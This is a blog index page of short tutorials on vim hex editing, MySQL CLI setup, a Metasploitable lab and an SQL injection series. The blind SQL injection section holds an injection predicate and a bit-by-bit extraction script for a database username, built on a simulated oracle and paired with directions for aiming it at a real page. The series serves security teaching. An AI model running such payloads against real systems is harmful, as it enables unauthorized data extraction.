How to use Vim as a Hex Editor

I want to display the hex representation of a binary compiled from a helloworld.c program, using vim.

The source code of the helloworld.c:

#include <stdio.h>
int main()
{
   // printf() displays the string inside quotation
   printf("Hello, World!");
   return 0;
}

After compiling the helloworld binary with gcc:

gcc helloworld.c -o helloworld

Open the executable in vim. Use -b (binary mode) so vim does not append a trailing newline or convert line endings when the file is written back:

vim -b helloworld

The last step is to pipe the buffer through the xxd command with :%!xxd, which replaces the buffer with its hex dump. If you edit bytes, change only the hex digits (xxd ignores the ASCII column when reversing) and run :%!xxd -r before :w; writing the buffer while it still holds the dump would overwrite the executable with text.
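The same round trip from the shell, as an added example that is not part of the original post: xxd and xxd -r are the two filters vim runs behind :%!xxd and :%!xxd -r, so running them directly lets cmp prove the conversion is lossless, and the second function shows the scripted form of editing a few bytes in the dump. It assumes xxd (shipped with vim) is installed; the sample file is constructed inline so the script runs without a compiler.

```shell
#!/bin/sh
# Added example, not code from the original post: the xxd round trip that
# vim performs with :%!xxd and :%!xxd -r, run from the shell so the result
# can be checked with cmp. Assumes xxd (ships with vim) is installed.
#
# Interactive equivalent in vim:
#   vim -b helloworld   # -b: no added final newline, no line-ending conversion
#   :%!xxd              # buffer is now the hex dump
#   (edit hex digits only; xxd -r ignores the ASCII column on the right)
#   :%!xxd -r           # convert back BEFORE :w, or the dump text
#                       # overwrites the executable
#   :w

# Round trip file $1 through xxd and xxd -r.
# Returns 0 if byte-identical, 1 if not, 2 if xxd is not installed.
roundtrip_check() {
    command -v xxd >/dev/null 2>&1 || return 2
    tmp=$(mktemp)
    xxd "$1" | xxd -r > "$tmp"
    cmp -s "$1" "$tmp"
    rc=$?
    rm -f "$tmp"
    return "$rc"
}

# Replace the first occurrence of hex string $2 with $3 in file $1, the
# scripted version of editing a few bytes in the dump. The plain (-p) format
# drops the offset and ASCII columns, and tr removes the line wraps so a
# pattern cannot straddle two lines. Old and new must have the same length:
# changing the length shifts every following offset and breaks the ELF.
# Caveat: a hex pattern can also match starting at an odd nibble; for
# surgical edits use the offsets shown in the vim dump instead.
patch_hex() {
    command -v xxd >/dev/null 2>&1 || return 2
    [ ${#2} -eq ${#3} ] || { echo "old/new hex length differ" >&2; return 1; }
    tmp=$(mktemp)
    xxd -p "$1" | tr -d '\n' | sed "s/$2/$3/" | xxd -r -p > "$tmp"
    mv "$tmp" "$1"
}

# Constructed sample standing in for the compiled helloworld: ELF magic
# followed by the string the program prints (not a real executable).
make_sample() {
    printf '\177ELF\002\001\001\000Hello, World!\000' > "$1"
}
```

Run make_sample on a temporary file, then roundtrip_check and patch_hex on it; patch_hex with 48656c6c6f and 48454c4c4f turns "Hello" into "HELLO" without changing the file size.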

How to set up Metasploitable 3 on macOS Mojave

Today we’ll set up an environment of virtual machines (one Ubuntu and one Windows) that ship with intentional vulnerabilities ready to exploit, using Metasploitable 3 as the target machines and Kali as the attacker. Before that, here is the list of requirements you need:

Software requirements

You can install VirtualBox, Packer and Vagrant manually from their websites, or you can use brew (newer Homebrew versions have replaced the brew cask install syntax below with brew install --cask):

brew cask install virtualbox
brew cask install vagrant
brew install packer

System requirements

  • VT-x/AMD-V Supported Processor recommended
  • 65 GB Available space on drive
  • 4.5 GB RAM

Our environment, in the end, will have these 2 virtual machines, one running Ubuntu metasploitable3-ub1404 and one running Windows metasploitable3-win2k8.

Read More

Use ctrl + w to delete a word with MySQL Cli

By default, while you’re using the mysql CLI, the combination ctrl + w deletes the entire line, so if you type a long query and want to delete only the word before the cursor, ctrl + w will not do it and you have to fall back to backspace. The fix is to create the file ~/.editrc if it doesn’t exist and add this line (it applies to every libedit program; prefix it with mysql: to scope it to the mysql client only). Note that this works for a mysql client built against libedit, which is the case on macOS; a client linked against GNU readline reads ~/.inputrc instead:

bind "^W" ed-delete-prev-word

How to access the MySQL CLI With MAMP

First, start MAMP or MAMP PRO, then open your terminal and type:

/Applications/MAMP/Library/bin/mysql -uroot -p

Enter the password; by default the password is root:

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 254
Server version: 5.6.35 MySQL Community Server (GPL)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

If you want to use the command mysql directly without typing the entire path, you can edit one of these dot files, ~/.bashrc if you’re using bash or ~/.zshrc if you’re using zsh, and add this alias (the value must be quoted, otherwise the shell treats -uroot as an option of the alias command itself). Keep in mind that this stores the root password in plain text in your shell rc file and passes it on the command line, which the mysql client itself warns is insecure; if you prefer to be prompted, leave -proot out and keep only -p:

alias mysql='/Applications/MAMP/Library/bin/mysql -uroot -proot'

After editing the dot file with Vim or Nano, save it and source it so the change takes effect in the current shell:

If you use zsh:

source ~/.zshrc

If you use bash:

source ~/.bashrc

Now you can run the command mysql from the terminal without typing the full path.
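As an added example that is not part of the original post, here is the safer way to get the same convenience: the password goes into a ~/.my.cnf that only your user can read, which the mysql client reads automatically, and the alias carries no credentials at all. The path to MAMP’s bundled client is the one used above; the function writes to whatever path you pass it so it can be tried on a temporary file first.

```shell
#!/bin/sh
# Added example, not from the original post: keep the MAMP root password out
# of the alias. A [client] section in ~/.my.cnf is read automatically by the
# mysql client, so neither the shell rc file nor the command line carries it.
# Assumes MAMP's bundled client at /Applications/MAMP/Library/bin/mysql.

# Write a mysql client options file with owner-only permissions.
# $1 = path (normally "$HOME/.my.cnf"), $2 = user, $3 = password
write_my_cnf() {
    umask 077                      # never create it world-readable, even briefly
    printf '[client]\nuser=%s\npassword=%s\n' "$2" "$3" > "$1"
    chmod 600 "$1"                 # mysql ignores a world-writable options file
}

# Permission string of a file, e.g. "-rw-------", to verify the result.
perm_string() {
    ls -l "$1" | cut -c1-10
}

# With the file in place the alias no longer needs -uroot -proot:
#   alias mysql=/Applications/MAMP/Library/bin/mysql
# and `mysql` connects as root without prompting.
```

Call write_my_cnf "$HOME/.my.cnf" root root once, then add the credential-free alias to your rc file and source it as above.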

Blind SQL Injection # bit-by-bit Inference

In the previous post we used a binary search to recover each character of SYSTEM_USER(), narrowing down a whole byte (8 bits) with a series of comparison requests.

Now you’ll use another technique: each request tests a single bit at a chosen position.

Take the character s as an example: its decimal value is 115 and its binary representation is 0111 0011. To test it bit by bit you apply a bitwise AND against a mask with a single bit set; if the predicate is true that bit is 1, otherwise it is 0.

That makes seven requests, one per bit, with the masks 64, 32, 16, 8, 4, 2 and 1 (bit 128 is always 0 for an ASCII character, so it needs no request).
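The extraction described above scripted in POSIX shell, as an added example that is not the post’s own code. The vulnerable page is not reachable here, so oracle() is a constructed stand-in for the true/false behaviour of the page (assumed to be count-cars.php with an injectable id parameter) and SECRET is a constructed stand-in for the value SYSTEM_USER() would return; payload_for() builds the predicate a real request would inject, and the rest is the bit-by-bit reconstruction exactly as a script driving curl would do it.

```shell
#!/bin/sh
# Added example, not code from the original post. Recovers SYSTEM_USER() one
# bit at a time with bitwise AND. oracle() is a constructed stand-in for the
# true/false behaviour of the vulnerable page (assumed: count-cars.php with an
# injectable "id" parameter); SECRET is a constructed stand-in for the value
# the real database would return.

SECRET='root@localhost'

# Predicate injected for character position $1 (1-based) and bit mask $2, e.g.
#   1 AND (ORD(SUBSTRING(SYSTEM_USER(),1,1)) & 64) > 0
# True => the page behaves normally, false => the "no rows" behaviour.
payload_for() {
    printf '1 AND (ORD(SUBSTRING(SYSTEM_USER(),%d,1)) & %d) > 0' "$1" "$2"
}

# Simulated oracle: success (0) when bit $2 of character $1 of SECRET is set.
# ORD() of an empty SUBSTRING is 0, so every test past the end is false.
oracle() {
    c=$(printf '%s' "$SECRET" | cut -c"$1")
    [ -n "$c" ] || return 1
    code=$(printf '%d' "'$c")          # character to its byte value
    [ $(( code & $2 )) -ne 0 ]
}

# One request per bit, masks 64 down to 1. Bit 128 is always 0 for ASCII,
# so seven requests recover a character.
infer_char() {
    value=0
    for mask in 64 32 16 8 4 2 1; do
        oracle "$1" "$mask" && value=$(( value | mask ))
    done
    printf "$(printf '\\%03o' "$value")"   # byte value back to a character
}

# Walk the positions until a probe of all seven bits at once (mask 127) is
# false, i.e. SUBSTRING returned nothing. Cheaper in practice: recover
# LENGTH(SYSTEM_USER()) first with the same bit technique.
infer_string() {
    pos=1; result=''
    while oracle "$pos" 127; do
        result="$result$(infer_char "$pos")"
        pos=$(( pos + 1 ))
    done
    printf '%s' "$result"
}
```

Against the real target, replace the body of oracle() with a request that sends payload_for "$1" "$2" in the id parameter and returns 0 when the response shows the normal output; the rest of the script is unchanged, and a 14-character name costs 7 × 14 bit requests plus the end-of-string probes.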

Read More

Blind SQL Injection # Inference Techniques

Blind SQL Injection is an attack based on inference, because no error or warning message is displayed. In this article you’ll use inference techniques for the use case of recovering the current MySQL username and hostname through vulnerable code.

You’ll use the same tables and data as in the previous setup, and this is the code of the count-cars.php page:

Read More

SQL Injection VS Blind SQL Injection

So far you have learned how to trigger a SQL error by sending SQL code from the client (browser) to the server. Sometimes, however, the web application shows no error message from the database, and that doesn’t mean the code is not vulnerable, which is why you have to pay attention to the details.

A normal SQL injection is closely related to a blind SQL injection. The difference is that with a blind injection the application displays no database error telling you that your SQL syntax is wrong, so you have to ask true or false questions and watch how the responses differ. A normal SQL injection, on the other hand, shows an error message, which makes exploiting the vulnerability less difficult.

Environment Setup

You’ll set up an environment to test both cases. The examples will run against a database with two related tables, users and cars, with a one-to-many (1:n) cardinality, where a car can have multiple users.

Read More

SQL Injection Attacks # Intro

Welcome to this journey of understanding the famous SQL Injection vulnerability. We’ll go through the basics together and explore it step by step.

What’s a Web Application

Before going further, let’s first describe what a web application is. A web application is an application accessed from a web browser, where the browser is responsible for rendering the result coming from a web server.

Let’s take the simple example of this blog, which runs on the WordPress CMS: you’re reading this article in a web browser (Google Chrome, Firefox, Internet Explorer…) installed on your computer, while the article itself is stored in a database server and served by an HTTP server running a server-side scripting language.

What I describe here are the combined parts that form a web app: the presentation part (the web browser), the logic part (a server-side programming language, in this case PHP), and finally the storage part, the database (MySQL, SQL Server, Oracle…).

Read More

How to access to the graphcool database using CLI or PhpMyAdmin

I already have the containers running under the project name users-permissions, and this is the list of the containers:

04db65cb9ba7        graphcool/graphcool-dev:0.11.1   "/app/bin/single-ser…"   2 hours ago         Up 2 hours          0.0.0.0:60000->60000/tcp         users_permissions_graphcool_1
bab62d6ed0ec        mysql:5.7                        "docker-entrypoint.s…"   2 hours ago         Up 2 hours          3306/tcp, 33060/tcp              users_permissions_graphcool-db_1
f26d74765251        graphcool/localfaas:0.11.1       "/app/bin/localfaas"     2 hours ago         Up 2 hours          0.0.0.0:60050->60050/tcp         users_permissions_localfaas_1

As you can see, the container that holds our database is named users_permissions_graphcool-db_1 and is created from the mysql:5.7 image. Note that its ports 3306 and 33060 are exposed only inside the Docker network (no 0.0.0.0 mapping to the host, unlike the other two containers), which matters for how you reach it. I have two ways to access it: one uses the CLI and the other uses phpMyAdmin.

Read More